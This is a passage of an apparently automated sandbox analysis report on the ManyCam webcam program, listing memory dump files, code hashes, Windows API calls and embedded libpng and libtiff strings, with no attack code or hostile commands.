                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Proc$CallLong
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2055830364-0
                                                                                                                                            • Opcode ID: 781e254806f28d8ec1998a1fdf62ac066f1f4662daf48ff0b73b9976a098207e
                                                                                                                                            • Instruction ID: 07f4ca85a8015ac2f5064d515c453b55e06e997a5d10826443d9742014c300f8
                                                                                                                                            • Opcode Fuzzy Hash: 781e254806f28d8ec1998a1fdf62ac066f1f4662daf48ff0b73b9976a098207e
                                                                                                                                            • Instruction Fuzzy Hash: 1841A2B2644700AFD720DB28DC95F6BB3E8FB88710F408A1DFA8593291D770ED018BA5
                                                                                                                                            APIs
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00B957F7
                                                                                                                                            • GetTickCount.KERNEL32 ref: 00B95816
                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00B95849
                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00B95889
                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B958A4
                                                                                                                                            • Sleep.KERNEL32(00000001), ref: 00B958B0
                                                                                                                                            • TranslateMessage.USER32(?), ref: 00B958C0
                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00B958CB
                                                                                                                                            • TranslateMessage.USER32(?), ref: 00B958EA
                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00B958F5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Dispatch$CountTickTranslate$PeekSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2014057112-0
                                                                                                                                            • Opcode ID: 9b84f8df6570df636a08f10a05b0c76ca38910198461996faeb8b07c1ba7ae66
                                                                                                                                            • Instruction ID: 0f146931093de339fdffba3c7f93e7cbc3fa3167d71fe4d6fd91b2e77ecee9d8
                                                                                                                                            • Opcode Fuzzy Hash: 9b84f8df6570df636a08f10a05b0c76ca38910198461996faeb8b07c1ba7ae66
                                                                                                                                            • Instruction Fuzzy Hash: F83127311897019BDB31DF64DDC4B6AB7E8EB84B10F40497EF98193190EB70E849C762
                                                                                                                                            APIs
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(7EC02BB4,?,?,?,?,?,?,00530C89,000000FF), ref: 00488924
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488936
                                                                                                                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488941
                                                                                                                                            • ?capacity@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 00488952
                                                                                                                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 0048895D
                                                                                                                                            • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W@Z.MSVCP80(00000000,00000000,?,?,?,?,00530C89,000000FF), ref: 0048897B
                                                                                                                                            • ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP80(?,?,?,?,?,00530C89,000000FF), ref: 00488998
                                                                                                                                            • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,?,?,00530C89,000000FF), ref: 004889A8
                                                                                                                                            • ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@PB_W@Z.MSVCP80(00000000,00000000,?,?,?,?,00530C89,000000FF), ref: 004889B7
                                                                                                                                            • ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@PB_W@Z.MSVCP80(00000000,?,?,?,?,00530C89,000000FF), ref: 004889C6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?append@?$basic_string@_V12@$?size@?$basic_string@D@2@@std@@D@std@@Myptr@?$basic_string@_U?$char_traits@V?$allocator@$??0?$basic_string@_??1?$basic_string@_?capacity@?$basic_string@_V12@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2582929383-0
                                                                                                                                            • Opcode ID: 99d232171a17d203477813e664fcae17ef49d5089341ea70655ec06df161d3e9
                                                                                                                                            • Instruction ID: cf8cf326054b3b9829f24e0287d30cae8bbcd3a7b8d77b238681494193127ac1
                                                                                                                                            • Opcode Fuzzy Hash: 99d232171a17d203477813e664fcae17ef49d5089341ea70655ec06df161d3e9
                                                                                                                                            • Instruction Fuzzy Hash: 62316F75900118EFDB04EF64D844AADBBB6FF98350F00852AF91697390DB349D45CF84
                                                                                                                                            APIs
                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000), ref: 004B2816
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004B280A
                                                                                                                                              • Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004B284D
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004B287B
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004B2926
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 004B2938
                                                                                                                                            Strings
                                                                                                                                            • - PIN Id=%s Name=%s Dir=%s ConnectedTo=%s (%s), xrefs: 004B29AF
                                                                                                                                            • ConnectionMediaType:, xrefs: 004B29CD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeap$FreeTask
                                                                                                                                            • String ID: - PIN Id=%s Name=%s Dir=%s ConnectedTo=%s (%s)$ConnectionMediaType:
                                                                                                                                            • API String ID: 2977454536-3767152877
                                                                                                                                            • Opcode ID: 7365bd653b06ff7014c07b105e705209bc8ea7cbefe77dba3365ebff6c9963ec
                                                                                                                                            • Instruction ID: 9de56078743278097fdae2ef512013b449c6826a7b1472736913757348bad0bc
                                                                                                                                            • Opcode Fuzzy Hash: 7365bd653b06ff7014c07b105e705209bc8ea7cbefe77dba3365ebff6c9963ec
                                                                                                                                            • Instruction Fuzzy Hash: 77A114719041189FCB29EB65CD84BDEB7B4AF49304F5081DAE00AA7291DB746F88CFA4
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCR80 ref: 00B91D14
                                                                                                                                            • AVIFileCreateStreamA.AVIFIL32(?,?,vids), ref: 00B91DCD
                                                                                                                                            • AVISaveOptions.AVIFIL32(00000000,00000000,00000001,?,?,?,?,vids), ref: 00B91E52
                                                                                                                                            • AVIMakeCompressedStream.AVIFIL32(?,?,?,00000000,?,?,vids), ref: 00B91E69
                                                                                                                                            • AVIStreamSetFormat.AVIFIL32(?,00000000,?,00000428,?,?,?,00000000,?,?,vids), ref: 00B91E94
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,00000008,?,?,00000000,?,00000428,?,?,?,00000000,?,?,vids), ref: 00B91EC7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Stream$Create$CompressedFileFormatImageMakeOptionsSavememset
                                                                                                                                            • String ID: vids$vids
                                                                                                                                            • API String ID: 1290796960-2916420342
                                                                                                                                            • Opcode ID: d5f6c89e975ee4b00564c70d84b236ad3d660cd0d6369b48b1fe2e5231c050e0
                                                                                                                                            • Instruction ID: 3860ceb6bf900c4281d0e11fdb49952893a9101950fc0f2265eadd65ac601711
                                                                                                                                            • Opcode Fuzzy Hash: d5f6c89e975ee4b00564c70d84b236ad3d660cd0d6369b48b1fe2e5231c050e0
                                                                                                                                            • Instruction Fuzzy Hash: AD717CB0508745DFD720CF29D880AABBBE8FF88355F104E6EF98883251E7349944CB52
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Application is running with png.c from libpng-%.20s, xrefs: 00BB8DD4
                                                                                                                                            • Incompatible libpng version in application and library, xrefs: 00BB8DE6
                                                                                                                                            • Application was compiled with png.h from libpng-%.20s, xrefs: 00BB8DB7
                                                                                                                                            • 1.2.8, xrefs: 00BB8D57, 00BB8D84, 00BB8DCC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _setjmp3
                                                                                                                                            • String ID: 1.2.8$Application is running with png.c from libpng-%.20s$Application was compiled with png.h from libpng-%.20s$Incompatible libpng version in application and library
                                                                                                                                            • API String ID: 3837033383-821774253
                                                                                                                                            • Opcode ID: 5b45db52063ac99a70f7d432f4396e2b6d90a5c7765a45e6c922285ad1a5b184
                                                                                                                                            • Instruction ID: 8a7631986fd9a5fabe5ca7184dea145fbbc9d828b31f07e82eb0ad5218736cde
                                                                                                                                            • Opcode Fuzzy Hash: 5b45db52063ac99a70f7d432f4396e2b6d90a5c7765a45e6c922285ad1a5b184
                                                                                                                                            • Instruction Fuzzy Hash: D141FF71A416086FE720AB649C42FFBB7E9DF55300F14419AF98857282EBF0AD01C7A5
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFocusFreeMessagesprintfvsprintf
                                                                                                                                            • String ID: %s Warning$LIBTIFF
                                                                                                                                            • API String ID: 663082726-3418978845
                                                                                                                                            • Opcode ID: 97607ac2adaa171715d2c212955dcffbbc84ab6c4b8ccff55f4d5a9a999637a0
                                                                                                                                            • Instruction ID: c5142d17dd7cd3777b6c0844ed9d92967ff0aef7dc6887874e0ac8de46ffab2f
                                                                                                                                            • Opcode Fuzzy Hash: 97607ac2adaa171715d2c212955dcffbbc84ab6c4b8ccff55f4d5a9a999637a0
                                                                                                                                            • Instruction Fuzzy Hash: 5311253620251027C20447798C48E7B7F9CEF95372B25031EF6A6D36D2DFA2DC024264
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFocusFreeMessagesprintfvsprintf
                                                                                                                                            • String ID: %s Error$LIBTIFF
                                                                                                                                            • API String ID: 663082726-2650228428
                                                                                                                                            • Opcode ID: 511c68ad8120dea29c1ec87bebec517043de971329bad517e062adcb1ad399c2
                                                                                                                                            • Instruction ID: b5f1e84877aa68ae9ea403130dcc6b39f748a65e4c2ba8cb2a495802e144f16a
                                                                                                                                            • Opcode Fuzzy Hash: 511c68ad8120dea29c1ec87bebec517043de971329bad517e062adcb1ad399c2
                                                                                                                                            • Instruction Fuzzy Hash: 8511253610251467C20847798C58E7BBFDCEF99372F24031EF666D36D2DF619D0242A0
                                                                                                                                            Strings
                                                                                                                                            • zero length keyword, xrefs: 00BC0AFB
                                                                                                                                            • Zero length keyword, xrefs: 00BC0AB1
                                                                                                                                            • Out of memory while procesing keyword, xrefs: 00BC0990
                                                                                                                                            • leading spaces removed from keyword, xrefs: 00BC0A36
                                                                                                                                            • keyword length must be 1 - 79 characters, xrefs: 00BC0AD0
                                                                                                                                            • extra interior spaces removed from keyword, xrefs: 00BC0A96
                                                                                                                                            • trailing spaces removed from keyword, xrefs: 00BC0A0F
                                                                                                                                            • invalid keyword character 0x%02X, xrefs: 00BC09D0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Out of memory while procesing keyword$Zero length keyword$extra interior spaces removed from keyword$invalid keyword character 0x%02X$keyword length must be 1 - 79 characters$leading spaces removed from keyword$trailing spaces removed from keyword$zero length keyword
                                                                                                                                            • API String ID: 0-1527206911
                                                                                                                                            • Opcode ID: bedc28cd9c24573c2c705e60748bbc5797dbd2953d16a1875ad0c1ebca8dfdfe
                                                                                                                                            • Instruction ID: 4c1b2359457d57408804ede81d956ce794698a72aebb5622e8b719b94c451ec5
                                                                                                                                            • Opcode Fuzzy Hash: bedc28cd9c24573c2c705e60748bbc5797dbd2953d16a1875ad0c1ebca8dfdfe
                                                                                                                                            • Instruction Fuzzy Hash: D4515C265583888FD720AE289881FBA7BE5DF67304F4405DDF8C457343D7E6984787A2
                                                                                                                                            APIs
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00B95FCF
                                                                                                                                              • Part of subcall function 00B94C20: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B94CA7
                                                                                                                                              • Part of subcall function 00B94C20: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,0004001F,00000000,?,00000000), ref: 00B94D0E
                                                                                                                                            • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B95FFA
                                                                                                                                            • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B96003
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00B9603B
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00B96042
                                                                                                                                            • DeleteDC.GDI32(?), ref: 00B96050
                                                                                                                                            • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B9606B
                                                                                                                                            • cvFree_.CXCORE099(?), ref: 00B9606E
                                                                                                                                            • cvFree_.CXCORE099 ref: 00B9607D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$DeleteFree_Object$CreateOpenRectSelect
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1534964170-0
                                                                                                                                            • Opcode ID: 93539ac4b5fd21a009ff30543827438666f991ce8c20c469109b8ea1b8def9c0
                                                                                                                                            • Instruction ID: 7b3917fa8cae2a72c8bfcfb17ed3585c5cfb4bb69ddc31f1d32efb4bd92304c1
                                                                                                                                            • Opcode Fuzzy Hash: 93539ac4b5fd21a009ff30543827438666f991ce8c20c469109b8ea1b8def9c0
                                                                                                                                            • Instruction Fuzzy Hash: E32117B5600700AFC720DF69ECD4D27B7F9FB843107508A6DEA5683651DB35FC098A60
                                                                                                                                            APIs
                                                                                                                                            • ?erase@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@II@Z.MSVCP80(00000000,7EC02BB4,7EC02BB4,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 004887D9
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(7EC02BB4,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 004887E7
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,00488794,7EC02BB4,0049A100,0049A100), ref: 004887F5
                                                                                                                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,00488794,7EC02BB4,0049A100,0049A100), ref: 00488800
                                                                                                                                            • ?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 00488819
                                                                                                                                            • ?substr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV12@II@Z.MSVCP80(?,00000000,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 0048882E
                                                                                                                                            • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@ABV01@@Z.MSVCP80(?,?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 0048884B
                                                                                                                                            • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,00488794,7EC02BB4,0049A100,0049A100), ref: 0048885B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$Myptr@?$basic_string@_$V12@$??1?$basic_string@_??4?$basic_string@_?erase@?$basic_string@_?size@?$basic_string@?substr@?$basic_string@_D@2@@std@@D@std@@U?$char_traits@V01@V01@@V?$allocator@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 731949045-0
                                                                                                                                            • Opcode ID: 2f69720e727eced4ed2275371a078fe7476b196afe62a487cd70bae6314d5383
                                                                                                                                            • Instruction ID: 4406f9edcf3e418624fedf0353d0674b6ffa21746b1b988d8d39eeb2d4d24482
                                                                                                                                            • Opcode Fuzzy Hash: 2f69720e727eced4ed2275371a078fe7476b196afe62a487cd70bae6314d5383
                                                                                                                                            • Instruction Fuzzy Hash: 5C314D31900108EFDB04EF59E898A9DBBB6FB98350F40C52AF91A973A0DB30A944DF54
                                                                                                                                            APIs
                                                                                                                                            • IsWindow.USER32(?), ref: 00B91694
                                                                                                                                            • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00B916AB
